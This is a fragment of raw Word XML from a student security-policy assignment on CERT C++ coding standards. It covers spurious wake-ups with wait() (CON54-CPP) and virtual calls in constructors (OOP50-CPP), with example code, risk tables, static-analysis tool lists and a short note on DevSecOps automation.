            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> Validate Input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multithreaded environments, the state of shared data (list.next in this case) must be validated both before and after waking up from a wait() call. Spurious or malicious wake-ups can cause threads to proceed even when the condition predicate does not hold, potentially leading to undefined behavior or errors.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compliant code ensures the shared data (list.next) is always validated through a while loop, preventing premature execution based on invalid assumptions.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 Defense in Depth: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Threads may be notified spuriously or due to notify_all() calls from other threads. Relying solely on the notification signal is not sufficient. Wrapping wait() in a loop provides an additional safeguard to re-check the condition predicate, ensuring the thread resumes execution only when the condition is truly met.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layered approach minimizes the risk of race conditions or improper synchronization, providing a robust defense against threading anomalies.</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Threat Level</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1806"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1805"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806"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Severity</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Likelihood</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Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>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1805"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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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Unlikely</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
            </w:pP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p>
        </w:tc>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P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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L3</w:t>
            </w:r>
          </w:p>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w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="3611"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460"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Tool</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Version</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Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="361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Description Tool</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CodeSonar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8.1p0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LANG.STRUCT.ICOL</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CONCURRENCY.BADFUNC.CNDWAIT</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Inappropriate Call Outside Loop</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of Condition Variable Wait</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Klocwork</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2024.3</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CERT.CONC.WAKE_IN_LOOP</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Parasoft C/C++test</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2023.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
            </w:pP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CERT_CPP-CON54-a</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Wrap functions that can spuriously wake up in a loop</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Polyspace Bug Finder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R2024a</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 C++: CON54-CPP</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Checks for situations where functions that can spuriously wake up are not wrapped in loop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Standard 10</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807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="7632"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="42"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Coding Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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Label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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Do not invoke virtual functions from constructors or destructors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="321" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="f3f3f3"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Choice]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341"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OOP50-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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directly or indirectly invoke a virtual function from a constructor or destructor that attempts to call into the object under construction or destruction. Because the order of construction starts with base classes and moves to more derived classes, attempting to call a derived class function from a base class under construction is dangerous. The derived class has not had the opportunity to initialize its resources, which is why calling a virtual function from a constructor does not result in a call to a function in a more derived class. Similarly, an object is destroyed in reverse order from construction, so attempting to call a function in a more derived class from a destructor may access resources that have already been released.</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26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Noncompliant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noncompliant code example, the base class attempts to seize and release an object's resources through calls to virtual functions from the constructor and destructor. However, the B::B() constructor calls B::seize() rather than D::seize(). Likewise, the B::~B() destructor calls B::release() rather than D::release().</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 B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 seize();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virtual ~B() { release();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virtual void seize();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virtual void release();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 D : B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virtual ~D() = default;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seize() override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B::seize();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Get derived resources...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release() override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Release derived resources...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B::release();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8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compliant solution, the constructors and destructors call a nonvirtual, private member function (suffixed with mine) instead of calling a virtual function. The result is that each class is responsible for seizing and releasing its own resources.</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B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seize_mine();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release_mine();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 seize_mine();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virtual ~B() { release_mine();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virtual void seize() { seize_mine();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virtual void release() { release_mine();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D : public B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seize_mine();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release_mine();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 { seize_mine();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virtual ~D() { release_mine();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seize() override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B::seize();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seize_mine();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release() override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release_mine();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B::release();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780"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> The principle of Least Privilege and Architect and Design for Security Policies are key here. Calling virtual functions in constructors or destructors can expose uninitialized or invalid resources from derived classes, as the class may not be fully constructed or could already be partially destroyed. This can compromise the integrity and security of the object. By avoiding virtual function calls in these methods and using nonvirtual functions instead, the derived class's resources are only accessed when properly initialized. This approach ensures that each class manages its own resources safely, preventing vulnerabilities and supporting sound security design by maintaining a predictable and controlled object lifecycle.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Threat Level</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1806"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1805"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806"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Severity</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Likelihood</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Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>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1805"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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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Unlikely</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p>
        </w:tc>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P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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L3</w:t>
            </w:r>
          </w:p>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w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="3611"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460"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Tool</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Version</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Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="361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Description Tool</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Astrée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22.10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virtual-call-in-constructor</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invalid_function_pointer</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Fully checked</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Clang</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clang-analyzer-alpha.cplusplus.VirtualCall</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Checked by clang-tidy</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CodeSonar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8.1p0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LANG.STRUCT.VCALL_IN_CTOR</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LANG.STRUCT.VCALL_IN_DTOR</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 Call in Constructor</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 Call in Destructor</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Parasoft C/C++test</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2023.1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CERT_CPP-OOP50-a</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CERT_CPP-OOP50-b</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CERT_CPP-OOP50-c</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CERT_CPP-OOP50-d</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Avoid calling virtual functions from constructors</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Avoid calling virtual functions from destructors</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use dynamic type of an object under construction</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use dynamic type of an object under destruction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Defense-in-Depth Illustration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illustration provides a visual representation of the defense-in-depth best practice of layered security.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11277" w:dyaOrig="6377">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000001" style="width:563.850000pt;height:318.8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Project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seven steps outlined below that align with the elements you will be graded on in the accompanying rubric. When you complete these steps, you will have finished the security policy.</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Revise the C/C++ Standards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pPr>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Risk Assessment </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pPr>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Automated Detection</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if any. This table ties to a specific C++ coding standard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="72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Automation</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 written explanation using the image provided.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="720" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="8200" w:dyaOrig="4131">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000002" style="width:410.000000pt;height:206.5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Automation should be integrated at key points in the DevSecOps lifecycle to ensure security standards are enforced. In the Pre-production phase, automation can help assess security risks and ensure the backlog includes security tasks. During the Design phase, automated checks can ensure security is part of the design process. In the Build phase, automation can scan code and dependencies for security vulnerabilities and enforce security configurations.</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Verify and Test, automated testing tools can be used to scan for vulnerabilities in the code before it's deployed. In the Production phase, automation continues during the Transition and Health Check stage to validate security settings and test for weaknesses. In the Monitor and Detect stage, automated systems should be in place to track security threats in real-time and alert teams to any issues.</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a threat is detected, automation should be used in the Respond phase to quickly block attacks and recover systems. Finally, in the Maintain and Stabilize phase, automation ensures systems meet security standards and can recover from attacks or failures.</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Throughout the process, the entire pipeline should be automated to enforce security standards and provide continuous monitoring, allowing teams to quickly identify and address security risks. This ensures a strong security posture while maintaining operational efficiency.</w:t>
      </w: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Summary of Risk Assessments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Consolidate all risk assessments into one table including both coding and systems standards, ordered by standard number.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="720" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="26"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1434"/>
        <w:gridCol w:w="1349"/>
        <w:gridCol w:w="1856"/>
        <w:gridCol w:w="2041"/>
        <w:gridCol w:w="2680"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="a5a5a5" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="114" w:type="dxa"/>
              <w:right w:w="11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Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="836967" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="114" w:type="dxa"/>
              <w:right w:w="11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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="836967" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="114" w:type="dxa"/>
              <w:right w:w="11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Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="836967" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="114" w:type="dxa"/>
              <w:right w:w="11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Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="836967" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="114" w:type="dxa"/>
              <w:right w:w="11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Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="836967" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="114" w:type="dxa"/>
              <w:right w:w="11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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="143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STD-001-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434"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r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349"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Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041"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r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268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L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="a5a5a5" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="a5a5a5"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DCL12-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349"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Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856"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tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041"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P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680"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L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="143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MSC52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349"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Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041"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P8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268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L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="a5a5a5" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="a5a5a5"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ERR34-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349"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Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041"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P4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680"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L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="143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STR02-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434"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r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349"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Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041"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P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268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L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="a5a5a5" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="a5a5a5"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MEM30-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434"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r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349"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Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041"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P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680"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L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="143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DCL03-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349"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Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856"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r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041"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P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268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L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="a5a5a5" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="a5a5a5"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ERR55-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349"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Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041"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P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680"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L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="143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MEM52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434"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r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349"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Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041"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P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268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L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="a5a5a5" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="a5a5a5"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CON54-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349"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Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041"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P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680"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L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:left w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:bottom w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:right w:val="single" w:color="c9c9c9" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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OOP50-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:left w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:bottom w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:right w:val="single" w:color="c9c9c9" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:left w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:bottom w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:right w:val="single" w:color="c9c9c9" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:left w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:bottom w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:right w:val="single" w:color="c9c9c9" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:left w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:bottom w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:right w:val="single" w:color="c9c9c9" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:left w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:bottom w:val="single" w:color="c9c9c9" w:sz="4"/>
              <w:right w:val="single" w:color="c9c9c9" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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L3</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Create Policies for Encryption and Triple A </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="720" w:firstLine="0"/>
